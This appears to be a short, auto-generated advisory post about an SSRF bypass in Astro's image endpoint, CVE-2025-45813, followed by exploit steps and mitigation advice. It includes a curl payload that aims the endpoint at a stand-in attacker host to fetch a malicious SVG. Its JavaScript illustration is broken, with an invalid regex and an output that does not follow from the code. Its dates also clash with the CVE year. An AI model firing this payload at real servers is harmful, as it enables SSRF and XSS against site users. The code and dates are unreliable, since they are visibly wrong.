Astro, SSRF due to Image Proxy Domain Validation Bypass, CVE-2025-45813 (High)

By /

Listen to this Post

The vulnerability CVE-2025-45813 is a patch bypass for a previous SSRF flaw (CVE-2025-58179) in Astro’s image optimization endpoint. The original fix attempted to block server-side requests to external URLs by checking for `http://`, `https://`, and `//` prefixes in the `href` parameter. However, this validation can be circumvented by using a single backslash character in place of the forward slashes. For example, providing an `href` value like `\raw.githubusercontent.com/…` bypasses the blocklist because the check for forward slashes fails. The backend processing logic then normalizes these backslashes back into forward slashes, resulting in a valid URL. This causes the Astro server to perform a server-side request to the attacker-controlled domain, leading to a Server-Side Request Forgery (SSRF). This SSRF can be leveraged to fetch external SVG files containing malicious scripts, potentially leading to Cross-Site Scripting (XSS) when the processed image is served to users.
Platform: Astro
Version: Pre-patch
Vulnerability: SSRF
Severity: High
date: 2024-10-28

Prediction: 2024-11-04

What Undercode Say:

curl "https://vulnerable-site.com/_image?href=\\attacker.com/xss.svg"

// Server-side fetch triggered with malformed URL
const userInput = "\attacker.com/payload.svg";
// Blocklist check fails, normalization occurs
const normalizedUrl = userInput.replace(/\/g, '/'); // Becomes "//attacker.com/payload.svg"
fetch(normalizedUrl);

How Exploit:

  1. Attacker crafts a URL with backslashes to bypass domain validation.
  2. Server normalizes the backslashes to forward slashes, creating a valid URL.

3. Astro server fetches the external, attacker-controlled resource.

  1. Malicious SVG content is served to clients, executing XSS.

Protection from this CVE:

Update Astro to the latest patched version. Implement an allowlist for image domains instead of a blocklist. Sanitize and validate all user-inputted URLs before fetching.

Impact:

Server-Side Request Forgery (SSRF) allowing internal network probing. Potential for Cross-Site Scripting (XSS) if malicious SVGs are fetched and served.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top